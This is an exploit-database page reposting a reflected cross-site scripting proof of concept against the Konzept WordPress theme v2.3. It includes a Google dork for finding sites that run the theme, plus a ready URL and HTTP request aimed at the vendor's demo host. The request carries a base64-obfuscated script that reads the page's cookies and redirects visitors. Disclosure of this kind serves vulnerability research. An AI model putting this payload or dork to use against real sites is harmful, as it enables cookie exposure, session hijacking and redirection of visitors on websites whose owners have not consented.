Advertisement






Konzept - Fullscreen Portfolio WordPress Theme v2.3 - Unauthenticated Reflected XSS

CVE Category Price Severity
CVE-XXXX-XXXX CWE-79 Not disclosed High
Author Risk Exploitation Type Date
Not specified High Remote 2020-07-30
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N 0.9482 0.7218

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020070148

Below is a copy:

Konzept - Fullscreen Portfolio WordPress Theme v2.3 - Unauthenticated Reflected XSS
[+] Exploit Title: Konzept - Fullscreen Portfolio WordPress Theme v2.3 - Unauthenticated Reflected XSS
[+] Google Dork: inurl:/wp-content/themes/konzept/
[+] Date: 2020-07-30
[+] Exploit Author: Vlad Vector [ https://vladvector.ru ]
[+] Vendor: IKONIZE [ https://themeforest.net/user/ikonize ]
[+] Software Version: 2.3
[+] Software Link: https://themeforest.net/item/konzept-fullscreen-portfolio-wordpress-theme/2383907
[+] Tested on: Debian 10
[+] CVE: 
[+] CWE: CWE-79



### [ Info: ]

[i] An Unauthenticated Reflected XSS vulnerability was discovered in the Konzept theme through 2.3 for WordPress.

[i] Injected payload will be triggered x25 times :)



### [ PoC: ]

[!] https://demo.ikonize.com/konzept/?s=%22%3E%3Cimg+src%3Dx+onerror%3Deval%28atob%28%60amF2YXNjcmlwdDphbGVydChgVkxBRCBWRUNUT1JgKTthbGVydChkb2N1bWVudC5jb29raWUpO3dpbmRvdy5sb2NhdGlvbj0naHR0cHM6Ly92bGFkdmVjdG9yLnJ1Lyc7%60%29%29%3B%3E

[!] GET /konzept/?s=%22%3E%3Cimg+src%3Dx+onerror%3Deval%28atob%28%60amF2YXNjcmlwdDphbGVydChgVkxBRCBWRUNUT1JgKTthbGVydChkb2N1bWVudC5jb29raWUpO3dpbmRvdy5sb2NhdGlvbj0naHR0cHM6Ly92bGFkdmVjdG9yLnJ1Lyc7%60%29%29%3B%3E HTTP/1.1
Host: demo.ikonize.com



### [ Contacts: ]

[#] Website: vladvector.ru
[#] Telegram: @vladvector
[#] Twitter: @vlad_vector
[#] GitHub: @vladvector

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.